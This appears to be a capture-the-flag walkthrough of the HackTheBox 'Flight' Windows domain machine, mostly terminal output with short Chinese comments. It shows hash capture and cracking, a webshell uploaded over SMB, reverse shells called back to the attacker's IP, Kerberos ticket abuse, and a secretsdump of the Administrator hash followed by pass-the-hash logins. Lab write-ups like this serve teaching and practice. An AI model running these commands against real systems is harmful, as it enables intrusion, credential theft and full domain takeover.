[~] The config file is expected to be at "/root/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with--ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.129.228.120:53 Open 10.129.228.120:80 Open 10.129.228.120:445 Open 10.129.228.120:464 Open 10.129.228.120:389 Open 10.129.228.120:593 Open 10.129.228.120:636 Open 10.129.228.120:3268 Open 10.129.228.120:3269 Open 10.129.228.120:9389 Open 10.129.228.120:49667 Open 10.129.228.120:49673 Open 10.129.228.120:49674 Open 10.129.228.120:49695 Open 10.129.228.120:49723 [~] Starting Script(s) [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-1807:26+0000 Initiating Ping Scan at 07:26 Scanning 10.129.228.120 [4 ports] Completed Ping Scan at 07:26, 0.11s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 07:26 Completed Parallel DNS resolution of 1 host. at 07:26, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 07:26 Scanning 10.129.228.120 [15 ports] Discovered open port 445/tcp on 10.129.228.120 Discovered open port 53/tcp on 10.129.228.120 Discovered open port 80/tcp on 10.129.228.120 Discovered open port 636/tcp on 10.129.228.120 Discovered open port 593/tcp on 10.129.228.120 Discovered open port 49673/tcp on 10.129.228.120 Discovered open port 49674/tcp on 10.129.228.120 Discovered open port 464/tcp on 10.129.228.120 Discovered open port 49723/tcp on 10.129.228.120 Discovered open port 3268/tcp on 10.129.228.120 Discovered open port 389/tcp on 10.129.228.120 Discovered open port 9389/tcp on 10.129.228.120 Discovered open port 49695/tcp on 10.129.228.120 Discovered open port 3269/tcp on 10.129.228.120 Discovered open port 49667/tcp on 10.129.228.120 Completed SYN Stealth Scan at 07:26, 1.74s elapsed (15 total ports) Nmap scan report for 10.129.228.120 Host is up, received echo-reply ttl 127 (0.47s latency). Scanned at 2026-06-1807:26:19 UTC for 2s
PORT STATE SERVICE REASON 53/tcp open domain syn-ack ttl 127 80/tcp open http syn-ack ttl 127 389/tcp open ldap syn-ack ttl 127 445/tcp open microsoft-ds syn-ack ttl 127 464/tcp open kpasswd5 syn-ack ttl 127 593/tcp open http-rpc-epmap syn-ack ttl 127 636/tcp open ldapssl syn-ack ttl 127 3268/tcp open globalcatLDAP syn-ack ttl 127 3269/tcp open globalcatLDAPssl syn-ack ttl 127 9389/tcp open adws syn-ack ttl 127 49667/tcp open unknown syn-ack ttl 127 49673/tcp open unknown syn-ack ttl 127 49674/tcp open unknown syn-ack ttl 127 49695/tcp open unknown syn-ack ttl 127 49723/tcp open unknown syn-ack ttl 127
Read data files from:/usr/share/nmap Nmap done:1 IP address (1 host up) scanned in2.43 seconds Raw packets sent:19 (812B) | Rcvd:16 (688B)
┌──(root㉿kaada)-[/home/kali/Desktop] └─# curl 10.129.228.120 <!DOCTYPE html> <htmllang="en"> <head> <title>g0 Aviation</title> <metacharset="utf-8"> <linkrel="stylesheet"href="css/reset.css"type="text/css"media="all"> <linkrel="stylesheet"href="css/layout.css"type="text/css"media="all"> <linkrel="stylesheet"href="css/style.css"type="text/css"media="all"> <scripttype="text/javascript"src="js/jquery-1.4.2.js" ></script> <scripttype="text/javascript"src="js/cufon-yui.js"></script> <scripttype="text/javascript"src="js/cufon-replace.js"></script> <scripttype="text/javascript"src="js/Myriad_Pro_italic_600.font.js"></script> <scripttype="text/javascript"src="js/Myriad_Pro_italic_400.font.js"></script> <scripttype="text/javascript"src="js/Myriad_Pro_400.font.js"></script> <!--[if lt IE 9]> <script type="text/javascript" src="js/ie6_script_other.js"></script> <script type="text/javascript" src="js/html5.js"></script> <![endif]--> </head> <bodyid="page1"> <!-- START PAGE SOURCE --> <divclass="body1"> <divclass="main"> <header> <divclass="wrapper"> <h1><ahref="index.html"id="logo">g0</a><spanid="slogan">International Travel</span></h1> <divclass="right"> <nav> <ulid="top_nav"> <li><ahref="#"><imgsrc="images/img1.gif"alt=""></a></li> <li><ahref="#"><imgsrc="images/img2.gif"alt=""></a></li> <liclass="bg_none"><ahref="#"><imgsrc="images/img3.gif"alt=""></a></li> </ul> </nav> <nav> <ulid="menu"> <liid="menu_active"><ahref="index.html">Home</a></li> <li><ahref="#">Our Aircraft</a></li> <li><ahref="#">Safety</a></li> <li><ahref="#">Charters</a></li> <li><ahref="#">Contacts</a></li> </ul> </nav> </div> </div> </header> </div> </div> <divclass="main"> <divid="banner"> <divclass="text1"> COMFORT<span>Guaranteed</span> <p>g0 is the world's largest aerospace company and leading manufacturer of commercial jetliners, defense, space and security systems, and service provider of aftermarket support.</p> </div> <ahref="#"class="button_top">Order Tickets Online</a></div> </div> <divclass="main"> <sectionid="content"> <articleclass="col1"> <divclass="pad_1"> <h2>Your Flight Planner</h2> <formid="form_1"action="#"method="post"> <divclass="wrapper pad_bot1"> <divclass="radio marg_right1"> <inputtype="radio"name="name1"> Round Trip<br> <inputtype="radio"name="name1"> One Way </div> <divclass="radio"> <inputtype="radio"name="name1"> Empty-Leg<br> <inputtype="radio"name="name1"> Multi-Leg </div> </div> <divclass="wrapper"> Leaving From: <divclass="bg"> <inputtype="text"class="input input1"value="Enter City or Airport Code"onBlur="if(this.value=='') this.value='Enter City or Airport Code'"onFocus="if(this.value =='Enter City or Airport Code' ) this.value=''"> </div> </div> <divclass="wrapper"> Going To: <divclass="bg"> <inputtype="text"class="input input1"value="Enter City or Airport Code"onBlur="if(this.value=='') this.value='Enter City or Airport Code'"onFocus="if(this.value =='Enter City or Airport Code' ) this.value=''"> </div> </div> <divclass="wrapper"> Departure Date and Time: <divclass="wrapper"> <divclass="bg left"> <inputtype="text"class="input input2"value="mm/dd/yyyy "onBlur="if(this.value=='') this.value='mm/dd/yyyy '"onFocus="if(this.value =='mm/dd/yyyy ' ) this.value=''"> </div> <divclass="bg right"> <inputtype="text"class="input input2"value="12:00am"onBlur="if(this.value=='') this.value='12:00am'"onFocus="if(this.value =='12:00am' ) this.value=''"> </div> </div> </div> <divclass="wrapper"> Return Date and Time: <divclass="wrapper"> <divclass="bg left"> <inputtype="text"class="input input2"value="mm/dd/yyyy "onBlur="if(this.value=='') this.value='mm/dd/yyyy '"onFocus="if(this.value =='mm/dd/yyyy ' ) this.value=''"> </div> <divclass="bg right"> <inputtype="text"class="input input2"value="12:00am"onBlur="if(this.value=='') this.value='12:00am'"onFocus="if(this.value =='12:00am' ) this.value=''"> </div> </div> </div> <divclass="wrapper"> <p>Passenger(s):</p> <divclass="bg left"> <inputtype="text"class="input input2"value="# passengers"onBlur="if(this.value=='') this.value='# passengers'"onFocus="if(this.value =='# passengers' ) this.value=''"> </div> <ahref="#"class="button2">go!</a></div> </form> <h2>Recent News</h2> <pclass="under"><ahref="#"class="link1">Nemo enim ipsam voluptatem quia</a><br> November 5, 2010</p> <pclass="under"><ahref="#"class="link1">Voluptas aspernatur autoditaut fjugit</a><br> November 1, 2010</p> <p><ahref="#"class="link1">Sed quia consequuntur magni</a><br> October 23, 2010</p> </div> </article> <articleclass="col2 pad_left1"> <h2>Welcome to our Website!</h2> <pclass="color1">As Italy's biggest manufacturing exporter, the company supports airlines and allied government customers in more than 150 countries.</p>
<divclass="wrapper pad_bot2"><ahref="#"class="button1">Reservation</a><ahref="#"class="button2">Fleet</a></div> <divclass="wrapper"> <articleclass="cols"> <h2>Apply to out Team!</h2> <p><strong>We are Hiring</strong> We are looking for talented engineers specializing in aeronautics. Quick apply to our team by going to the contact page.</p> </article> <divclass="box1"> <divclass="pad_1"> <divclass="wrapper"> </div> </div> </div> </div> </article> </section> </div> <divclass="body2"> <divclass="main"> <footer> <divclass="footerlink"> <pclass="lf">Copyright 2022 <ahref="#">flight.htb</a> - All Rights Reserved</p> <pclass="rf">Designed by <ahref="https://twitter.com/Geiseric4"class="twitter">Geiseric</a> & <ahref="https://twitter.com/Janit10043163"class="twitter">JDgodd</a></p> <divstyle="clear:both;"></div> </div> </footer> </div> </div> <scripttype="text/javascript"> Cufon.now(); </script> <!-- END PAGE SOURCE --> </body> </html>
┌──(root㉿kaada)-[/home/kali/Desktop] └─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://flight.htb/ --append-domain -t 25 -k | grep -v "302" =============================================================== Gobuster v3.8.2 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://flight.htb/ [+] Method: GET [+] Threads: 25 [+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt [+] User Agent: gobuster/3.8.2 [+] Timeout: 10s [+] Append Domain: true [+] Exclude Hostname Length: false =============================================================== Starting gobuster in VHOST enumeration mode =============================================================== [ERROR] error on word web: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body) [ERROR] error on word portal: timeout occurred during the request [ERROR] error on word server: timeout occurred during the request [ERROR] error on word sip: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body) [ERROR] error on word wordpress: timeout occurred during the request [ERROR] error on word images8: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body) [ERROR] error on word cas: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body) [ERROR] error on word origin-www: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body) [ERROR] error on word cisco: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body) [ERROR] error on word banner: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body) [ERROR] error on word mercury: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body) [ERROR] error on word w: could not read body context deadline exceeded (Client.Timeout or context cancellation while reading body) school.flight.htb Status: 200 [Size: 3996]
加入并访问
1
http://school.flight.htb/index.php?view=home.html
注意到参数view
尝试进行本地文件包含
失败
尝试进行远程文件包含
1 2 3 4
┌──(root?kaada)-[/home/kali/Desktop] └─# python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [ON]
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [ON] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [ON]
┌──(root㉿kaada)-[/home/kali/Desktop] └─# vim hash.txt
┌──(root㉿kaada)-[/home/kali/Desktop] └─# john hash.txt --wordlist=rockyou.txt Usingdefaultinputencoding: UTF-8 Loaded 1password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q'or Ctrl-C toabort, almost any other key for status S@Ss!K@*t13 (svc_apache) 1g 0:00:00:21 DONE (2026-06-1807:53) 0.04712g/s 502541p/s 502541c/s 502541C/s SADSAM..S42150461 Use the "--show --format=netntlmv2" optionsto display allof the cracked passwords reliably Session completed.
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [ON] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [ON]
┌──(root㉿kaada)-[/home/kali/Desktop] └─# vim hash.txt
┌──(root㉿kaada)-[/home/kali/Desktop] └─# john hash.txt --wordlist=rockyou.txt Usingdefaultinputencoding: UTF-8 Loaded 1password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q'or Ctrl-C toabort, almost any other key for status Tikkycoll_431012284 (c.bum) 1g 0:00:00:22 DONE (2026-06-1808:12) 0.04363g/s 459727p/s 459727c/s 459727C/s TinyMutt69..Tiffani29 Use the "--show --format=netntlmv2" optionsto display allof the cracked passwords reliably Session completed.
┌──(root㉿kaada)-[/opt/ntlm_theft/exploit] └─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284' Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Jun 18 15:13:15 2026 .. D 0 Thu Jun 18 15:13:15 2026 flight.htb D 0 Thu Jun 18 15:12:01 2026 school.flight.htb D 0 Thu Jun 18 15:12:01 2026
5056511 blocks of size 4096. 1253970 blocks available smb: \>
┌──(root㉿kaada)-[/opt/ntlm_theft/exploit] └─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284' Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Jun 18 15:13:15 2026 .. D 0 Thu Jun 18 15:13:15 2026 flight.htb D 0 Thu Jun 18 15:12:01 2026 school.flight.htb D 0 Thu Jun 18 15:12:01 2026
5056511 blocks of size 4096. 1253970 blocks available smb: \> cd flight.htb\ smb: \flight.htb\> dir . D 0 Thu Jun 18 15:12:01 2026 .. D 0 Thu Jun 18 15:12:01 2026 css D 0 Thu Jun 18 15:12:01 2026 images D 0 Thu Jun 18 15:12:01 2026 index.html A 7069 Thu Feb 24 05:58:10 2022 js D 0 Thu Jun 18 15:12:01 2026
5056511 blocks of size 4096. 1253714 blocks available smb: \flight.htb\>
┌──(root㉿kaada)-[/opt/ntlm_theft/exploit] └─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284' Try "help" to get a list of possible commands. smb: \> cd flight.htb\ smb: \flight.htb\> put webshell.php putting file webshell.php as \flight.htb\webshell.php (9.3 kB/s) (average 9.3 kB/s) smb: \flight.htb\>
┌──(root㉿kaada)-[/home/kali/Desktop] └─# ./penelope.py [+] Listening for reverse shells on 0.0.0.0:4444 -> 127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.17.0.1 • 172.18.0.1 • 198.18.0.1 • 10.10.14.31 ➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C) [+] [New Reverse Shell] => flight.htb 10.129.228.120 WINDOWS 👤 😍️ Session ID <1> [+] Added readline support... [+] Interacting with session [1] • Readline • Menu key Ctrl-D ⇐ [+] Session log: /home/kali/.penelope/sessions/flight.htb~10.129.228.120-WINDOWS/2026_06_18-08_34_16-576.log ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── C:\xampp\htdocs\flight.htb>
见鬼了Penelope一点都靠不住,还是手动的好使
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿kaada)-[/home/kali/Desktop] └─# nc -lvvp 4444 listening on [any] 4444 ... connect to [10.10.14.31] from flight.htb [10.129.228.120] 49260 SOCKET: Shell has connected! PID: 2772 Microsoft Windows [Version 10.0.17763.2989] (c) 2018 Microsoft Corporation. All rights reserved.
c:\Users\Public>.\RunasCs.exe c.bum Tikkycoll_431012284 cmd.exe -r 10.10.14.31:5555 [*] Warning: The logon foruser'c.bum'is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running insession0with process function CreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-74417$\Default [+] Async process 'C:\Windows\system32\cmd.exe'with pid 8 created in background.
c:\Users\Public>
1 2 3 4 5
c:\Users\C.Bum>type desktop\user.txt type desktop\user.txt e8337e2e095c01a3abd0db3fcc313dff
c:\inetpub\development>dir dir Volume in drive C has no label. Volume Serial Number is 1DF4-493D
Directory of c:\inetpub\development
06/18/202609:17 AM <DIR> . 06/18/202609:17 AM <DIR> .. 04/16/201802:23 PM 9,371 contact.html 06/18/202609:17 AM <DIR> css 06/18/202609:17 AM <DIR> fonts 06/18/202609:17 AM <DIR> img 04/16/201802:23 PM 45,949 index.html 06/18/202609:17 AM <DIR> js 2 File(s) 55,320 bytes 6 Dir(s) 5,060,624,384 bytes free
c:\inetpub\development>
传一个aspx马上去
1 2 3 4 5 6 7 8 9 10 11
┌──(root㉿kaada)-[/home/kali] └─# nc -lvvp 6666 listening on [any]6666 ... connect to[10.10.14.31]from flight.htb[10.129.228.120]65227 Microsoft Windows [Version 10.0.17763.2989] (c) 2018 Microsoft Corporation. All rights reserved.
GroupNameType SID Attributes ========================================== ================ ============ ================================================== Mandatory Label\High Mandatory Level Label S-1-16-12288 Everyone Well-known groupS-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known groupS-1-5-6 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known groupS-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known groupS-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known groupS-1-5-15 Mandatory group, Enabled by default, Enabled group BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group LOCAL Well-known groupS-1-2-0 Mandatory group, Enabled by default, Enabled group Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGESINFORMATION ----------------------
Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeMachineAccountPrivilege Add workstations to domain Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USERCLAIMSINFORMATION -----------------------
Userclaims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
c:\windows\system32\inetsrv>
SeImpersonatePrivilege Impersonate a client after authentication Enabled
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com' [*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb' [+] Kerberos GSS-API initialization success! [+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output. [*] Found the AP-REQ delegation ticket in the GSS-API output. [*] Authenticator etype: aes256_cts_hmac_sha1 [*] Extracted the service ticket session key from the ticket cache: rLe+6vNJB5BEMrJ9j2BfnHH4pEahLXaJbnfL4yBuyAc= [+] Successfully decrypted the authenticator [*] base64(ticket.kirbi):
┌──(root㉿kaada)-[/home/kali/Desktop] └─# sudo ntpdate 10.129.228.120 2026-06-1816:44:35.018250 (+0000) +25201.127685 +/- 0.04583710.129.228.120 s1 no-leap CLOCK: time stepped by 25201.127685
┌──(root㉿kaada)-[/home/kali/Desktop] └─# impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322 Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465 Administrator:des-cbc-md5:c7754cb5498c2a2f [*] Cleaning up...
直接登录即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
┌──(root㉿kaada)-[/home/kali/Desktop] └─# impacket-psexec Administrator@flight.htb -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c Impacket v0.14.0.dev0 - CopyrightFortra, LLC and its affiliated companies
[*] Requesting shares on flight.htb..... [*] Found writable share ADMIN$ [*] Uploading file YupGHLaF.exe [*] OpeningSVCManager on flight.htb..... [*] Creating service IUcq on flight.htb..... [*] Starting service IUcq..... [!] Press help for extra shell commands MicrosoftWindows [Version10.0.17763.2989] (c) 2018MicrosoftCorporation. All rights reserved.
C:\Windows\system32> whoami nt authority\system
C:\Windows\system32>
不知道为什么psexec会缺字符
1 2 3 4 5 6 7 8 9 10
┌──(root㉿kaada)-[/home/kali/Desktop] └─# impacket-smbexec Administrator@10.129.228.120 -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> type c:\users\administrator\desktop\root.txt 9131885ea46313a5ee0f36d645727a69